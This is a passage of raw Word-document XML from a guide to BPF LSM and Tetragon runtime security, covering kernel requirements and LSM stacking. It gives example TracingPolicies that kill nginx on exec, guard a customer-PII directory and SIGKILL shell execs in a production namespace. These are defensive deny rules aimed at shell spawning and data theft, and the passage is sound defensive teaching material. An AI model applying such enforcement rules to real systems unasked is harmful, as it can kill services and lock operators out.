        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SELinux (originated by NSA, widely used).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AppArmor (Ubuntu, SUSE).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Smack (embedded systems).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TOMOYO.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each of these implements policy through the LSM framework. They all enforce decisions at the same hook points.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">9.2 The BPF LSM Addition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Linux 5.7 (2020), BPF LSM was added. It allows eBPF programs to be attached as LSM modules. This is a MAJOR capability expansion:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No need to write kernel code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Policies can be loaded/unloaded at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Multiple BPF LSM programs can stack (subject to rules).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Standard eBPF safety guarantees (the verifier).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Before BPF LSM: enforcement required kernel modules or accepted modifications to classical LSMs. After BPF LSM: anyone can write policies as eBPF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">9.3 Why It Matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BPF LSM transforms the runtime security landscape:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">eBPF-based tools can do ENFORCEMENT (not just observation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Policies can be rich and dynamic (not static files).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kubernetes-native policies become feasible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integration with cluster state (labels, namespaces) is natural.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon's enforcement capabilities directly depend on BPF LSM. Without it, Tetragon would be a Falco-with-ancestry — still valuable but not transformatively different.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">9.4 Kernel Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BPF LSM needs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kernel 5.7+.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CONFIG_BPF_LSM=y compile option.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">bpf listed in the kernel boot parameter lsm=... OR added to /sys/kernel/security/lsm at boot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Check support:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Is BPF LSM compiled in?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ grep CONFIG_BPF_LSM /boot/config-$(uname -r)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFIG_BPF_LSM=y    # good</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Is BPF LSM enabled at boot?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ cat /sys/kernel/security/lsm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lockdown,capability,yama,selinux,bpf    # bpf = enabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If missing, enable by adding lsm=...bpf to kernel command line and rebooting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">9.5 Distribution Support</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As of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80"/>
        <w:gridCol w:w="348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Distribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Kernel support</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Enabled by default?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Ubuntu 22.04 LTS</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(5.15)</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Ubuntu 24.04 LTS</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(6.8)</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Debian 12 (Bookworm)</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(6.1)</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RHEL 9</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(5.14+)</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RHEL 8</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Partial (older kernels)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Check version</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Fedora (recent)</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Amazon Linux 2023</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Amazon Linux 2</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Older kernel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Typically no</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GKE Container-Optimized OS</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(recent versions)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EKS Bottlerocket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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AKS (recent)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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bl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modern managed Kubernetes offerings: generally yes. Older or self-managed clusters: verify.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">9.6 LSM Stacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A subtle point: LSMs STACK. Multiple LSMs can be active simultaneously; their decisions combine. If ANY LSM denies, the operation is denied.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example: a system running both SELinux and BPF LSM (Tetragon):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SELinux denies → operation denied.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon denies → operation denied.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BOTH allow → operation proceeds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is FINE — additive security. Each layer provides coverage for its niche. No conflicts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">9.7 Observing Without Enforcing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BPF LSM can also be used for OBSERVATION-ONLY — the eBPF program can emit an event without changing the return value. This is how Tetragon separates observability from enforcement:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Policy returns 0 from LSM hook → operation proceeds (observation only).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Policy returns -EPERM → operation denied (enforcement).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Same hook, different action, controlled by TracingPolicy. This is what enables Tetragon's "observability mode" as a safe default.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10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Writing TracingPolicies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10.1 A Gradual Approach</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Writing effective TracingPolicies takes practice. A good progression:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start with a BUILT-IN POLICY from Tetragon's examples repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy it. Observe events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modify it slightly. Observe how behavior changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Write a similar policy for your own use case.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test extensively in staging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add enforcement actions only after confidence builds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10.2 Example: Detect Exec from Web Server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scenario: our web server (nginx) should never exec other binaries. If nginx tries to exec anything, suspicious. Write a policy:</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no-exec-from-nginx</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"sys_execve"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    syscall: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"string"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    - index: 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      type: "char_buf"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    - index: 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      type: "char_buf"</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matchBinaries:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      - operator: "In"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"/usr/sbin/nginx"</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"Post"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This policy: whenever the nginx binary calls execve, emit an event. Observability only. Watch what happens. Confirm nginx doesn't legitimately exec anything (double-check this assumption).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After verifying nothing legitimate fires, convert to enforcement:</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      # SIGKILL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now any attempted exec from nginx results in nginx being KILLED. If an attacker compromises nginx and tries to run /bin/sh, nginx dies before the shell launches. Container restart is the visible effect; exfiltration is prevented.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10.3 Example: Protect a Secret File</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protect-customer-data</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"security_file_open"</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"Prefix"</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"/data/customer-pii/"</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"/usr/local/bin/pii-service"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        - "/usr/local/bin/backup-agent"</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This policy: any binary OTHER than pii-service or backup-agent, attempting to open anything under /data/customer-pii/, gets EPERM. Only the authorized processes can access the data. Defense against compromised other processes on the same machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10.4 Example: Block kubectl exec to Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For Kubernetes-audit-style detection, Tetragon has a different approach. Tetragon's main focus is kernel events, not K8s API. But you can combine:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Detect shell spawned via interactive terminal in prod namespace</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TracingPolicyNamespaced</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no-interactive-shell-prod</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  namespace: production</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"sys_execve"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    syscall: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"string"</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"/bin/bash"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        - "/bin/sh"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        - "/bin/zsh"</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Any shell execve in the production namespace → SIGKILL. Prevents kubectl exec debugging in production. (Have a break-glass process for legit emergencies.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10.5 Namespace-Scoped Policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TracingPolicyNamespaced lets you scope a policy to one namespace. Pattern useful for:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Production has strict rules; dev doesn't.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Different namespaces for different teams with different requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gradual rollout — enable strict rules for one namespace first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10.6 Testing Policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
